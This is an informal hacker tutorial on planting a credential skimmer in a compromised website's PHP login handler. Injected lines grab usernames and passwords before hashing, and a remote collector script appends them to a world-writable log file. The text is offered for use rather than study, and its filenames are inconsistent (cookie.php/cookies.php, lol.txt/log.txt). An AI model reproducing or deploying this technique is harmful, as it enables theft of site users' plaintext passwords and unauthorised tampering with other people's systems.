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Login Form Password Stealing - Tutorial

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[+] Login Form Password Stealing - Tutorial

[+] Author: Neutralise

[+] Location: http://thesoftwareengineer.org/services/tuts/LoginFormPassStealing.txt



It seems that alot of people these days are gaining shell access, downloading a database

then attempting to crack the hashes. If they are salted, sha1 or a hard to crack plain

ole' MD5, they start bitchin and moaning when they can't get the plain text. So here it

is, a tutorial on how to get user:pass format in plain text of ANY hash type.


Modify the login form of a site to catch the password remotely, before it is encrypted. I

will explain this more simply via an example.

Take the following login form for example,

<form method="post" action="cookies.php"><hr />

<p>User: <input type="text" class="buttonstyle" name="username"></p>

<p>Pass: <input type="password" class="buttonstyle" name="password"></p>

<p><input type="submit" value="Login" class="buttonstyle" name="submit">

<input type="reset" value="Reset" class="buttonstyle" /></p>


Now we can see that the action of this form points to 'cookies.php'. Now cookies.php

will probably include a function similar to this depending on the encryption type, etc.

$user = $_POST['username'];

$pass = $_POST['password'];

if(md5($user) == $usermd5 && md5($pass) == $passmd5){

setcookie("Whatever", $cookie, time()+3600, "/");

header("Location: index.php");



Now on to bypassing the encryption before it happens, thus gaining the username and

password in plain text we need to edit the 'cookie.php' site, add the following code at

the start of the php tags.


$user = $_POST['username'];

$pass = $_POST['password'];



Now the php file 'plain.php' will include the following code:


$user = $_GET['user'];

$pass = $_GET['pass'];

$file = "lol.txt";

$fp = fopen($file, "a");

fputs($fp, "$user:$pass\n");



Notice you will also need to upload a file 'lol.txt', and chmod it to 777.


Now everytime a user logs into the site you are editing the code of, it will send the

username and password to the 'plain.php' text file and save it in 'log.txt', on a remote

server in theformat of:





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